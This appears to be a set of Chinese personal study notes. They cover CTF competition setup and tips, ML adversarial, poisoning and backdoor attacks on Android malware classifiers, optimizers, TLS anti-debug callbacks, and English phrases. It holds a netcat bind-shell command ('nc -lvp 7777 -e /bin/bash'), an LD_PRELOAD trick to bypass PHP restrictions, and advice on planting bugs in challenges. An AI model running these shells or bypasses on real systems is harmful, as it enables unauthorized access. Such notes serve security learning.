Arnalog置乱：设置一个行列式值为1的矩阵，用它的高次幂×原来的图像。

Rust

Rust是一门系统编程语言，专注于安全，尤其是并发安全，支持函数式和命令式以及泛型等编程范式的多范式语言。
Rust在语法上和C++类似，但是设计者想要在保证性能的同时提供更好的内存安全。

CISCN

初赛

普通CTF

半决赛：

BuilldIt出题

• Web/Bin二选一实现
• 根据checker要求实现功能
• 提供Docker（把Linux系统切成几瓣，启动速度极快，和开了进程一样）file进行编译和运行
• 希望解题率？20%
• 控制难度

  实例

  基于消息队列实现rpc（远程过程调用）服务
• 同一个进程内调用

• IPC机制

• 基于网络

• 留出的漏洞

  • 协议解析错误（各种老软件可以去找找它的漏洞，整数溢出/格式化字符串etc.
  • 计算错误
  • 条件进程，UID泄露？纯粹的栈溢出和堆溢出现实中几乎不常见

• 发给主办方：题目源码，二进制，环境搭建

  • 环境搭建
    • Docker
    • Docker-compose
    • Xinetd

  一些命令

  • mkdir dev/null
  • makenod 建立设备
  • 把输入从std：：cout和TCP流之间的转换，常用socket
  • 也可以用xinetd搭建服务

  提问：4字节的sql注入，如何执行一个4字节以上的命令或者拿到shell

  先想一下<4字节的命令，然后重定向指定文件，*重建文件

  提问：temp文件下任意读写，环境变量

  elf指定一个动态链接器目录，去该目录下的动态链接器（ld），加载链接；
  这个过程中有一个环境变量：LD_PRELOAD，用LD_PRELOAD指向我写入temp的二进制文件。hook php的start等函数，抢先注册符号。

• 绕过php方法：

  • mail函数（新建一个进程）
  • error_log(发邮件发给我)

    BuildIt出题阶段总结

• 开发能力
• 代码量
• 藏洞

  1 2	idx=(idx+step)%size //整数溢出漏洞，负数%正数还是负数 a[idx]=x

  攻防赛介绍

  5分钟—15分钟一轮

  惨：被人攻破还宕机

• 题目多为虚拟机和大型逆向

  二进制部分，过去的出题目标就是让人做不出来；但是还能过审题

  更多的考察修补

强网杯

刘彦斌（ACM更多的是密码学，数学，算法方面），对于CTF帮助极大
Bin：

• Csapp（深入理解计算机系统）
• 程序员的自我修养—链接、装载和库
  Web：
  • Web前端（jss，nodejs）
  • Web后端

基础->实践->基础（抽象代数，离散，线代，体系结构）

看代码！！！（足够多/更熟练）

• 课上课下两步走（学长用了两年，国际前10）

  读项目方法？

• 文档+代码+调试
• 最好的方法，碰到了CTF题

靠猜做的题可以完全不用做

战队沟通

• 微信备选
• Slack首选
• 共享文档（关键，同步进度）

  -石墨，Google文档

  如何参赛

  人员分配&&题目选择
  跟榜~
  题目分配~（中等题目比较简单）

创新点

扩展攻击对象

原来：

针对图片，给图片增加扰动；

该图来源网络

若是扩展到文件，无法修改样本标签，因为对于可执行文件，存在大量的检测平台，恢复样本标签。

现在：

针对安卓样本分类检测模型的攻击。办法是不去修改apk文件的标签。

编写python脚本完成毒饵文件制作过程。

改进后门攻击

原来：

需要控制样本标签；攻击难度高

修改后：

无需控制样本标签；降低攻击难度，这套策略拿来就可以用

改进对抗攻击

原来：

黑盒环境下时，由于原始特征集的缺失，攻击效果下降；

需要攻击者在目标模型上进行大量的查询来获得大量反馈。

现在：

采用了Conformal Prediction统计学习算法计算，得到容易影响子模型的边缘样本，借助边缘样本获取关键特征，借助样本的可迁移性，极少的查询便可偷取目标模型的决策方式。

项目技术路线

A Simple Framework for Contrastive Learning of Visual Representations ，一种自监督学习手段

现有攻击方法

对抗性攻击

借助子模型模仿（偷取）目标模型生成对抗样本（具有可迁移性，使本地子模型分类错误的样本也可以适用于目标模型。）进行攻击。

原理：

训练得到的模型边界与真实的决策边界不一致。

(因为用于训练的原始样本集不可能将所有情况都涵盖。)

模型训练的边界与真实决策边界之间的空间就是对抗样本的空间。根据特征的梯度方向对样本特征进行改变，使得样本逐渐绕过边界。

缺陷：需要攻击者在目标模型上进行大量的查询来获得大量反馈。

防御：

• 微笑着面对它（主动防御）。训练阶段就使用对抗样本来训练模型，让模型更加健壮。
• 请求帮助（被动防御）。正式运行后，构建辅助网络，预测输入样本是对抗样本的概率。

投毒攻击

分类：针对目标的攻击、无差别投毒攻击、后门。

• 无差别投毒攻击：旨在破坏模型的可用性
• 目标性投毒：旨在通过投毒使得某一个或者某一类样本能躲避模型的检测。

原理：

无差别投毒攻击：伪造错误数据或者修改数据标签后，模型抓取到的数据是虚假的或者错误的，用人话说就是模型的世界观被歪曲或者颠倒了。

• 缺陷：需要控制样本标签；模型整个不可用了，易被发现

针对性投毒攻击：通过给样本添加目标标签对应的特征，让它绕过模型的边界。

• 缺陷：针对特定的样本，不能通用。

后门：让模型有后门。对于干净的数据集进行分类，只有遇到特定标记的样本时才会触发后门。

• 缺陷：需要控制样本标签；

防御：

与对抗性攻击的防御类似。训练之前预先过滤，检测剔除可疑样本；

正向

先虚拟机再主机

1

nc -lvp 7777 -e /bin/bash

1

nc 192.168.93.135 7777

• SGD(stochastic gradient descent) 随机梯度下降
• SGD with momentum
• Adagrad
• RMSProp
• Adam

Notation

参数： θt，

梯度： ∇ L(θt)，

动量：m_{t+1}

Problem Simplication

Off-line Learning

Generalization ，即SGDM收敛性一般优于Adam，而Adam训练起来比较快。可以设置Learning rate range，即upbound和lower bound，设置好stepsize，动态一大一小地设置学习率。

攻击原理

数据的价值在于其完整性、隐私性和可用性。“数据投毒”就是主要针对数据的完整性开展攻击，通过数据里“掺沙子”、加入“有毒”数据污染模型。

神经网络

1.神经网络特征

• 非线性
• 学习和自适应性：泛化能力
• 非凸性：函数有多个极值点，所以网络也有多个比较稳定的平衡态

2.神经网络发展

TLS （Thread Local Storage 线程局部存储 ）回调函数常用于反调试。创建进程的主线程时会自动调用回调函数,其运行要先于Entry Point代码执行.

每当创建/终止进程的线程时会自动调用执行（前后共调用两次）。

1.Yeah,I’m good to go. 我准备好了

2.Really?You don’t know what that means to me.我很感动

3.Knock Knock!How are we today?有人在吗，今天过得怎么样？

4.They’ll wind up calling her Geller，then he gets his way.他们最后就会只叫他盖勒，他就得逞了

5.We are kind of thing now.我们在交往

6.Things change，roll with the punches.世事难料，见招拆招（逆来顺受）

7.House cats, for one, are twilight hunters with vertically elongated pupils. 举个例子，黄昏的猎手家猫，有着竖直拉长的瞳孔。

8.cushions the blow.把打击变得和缓（降维打击？？）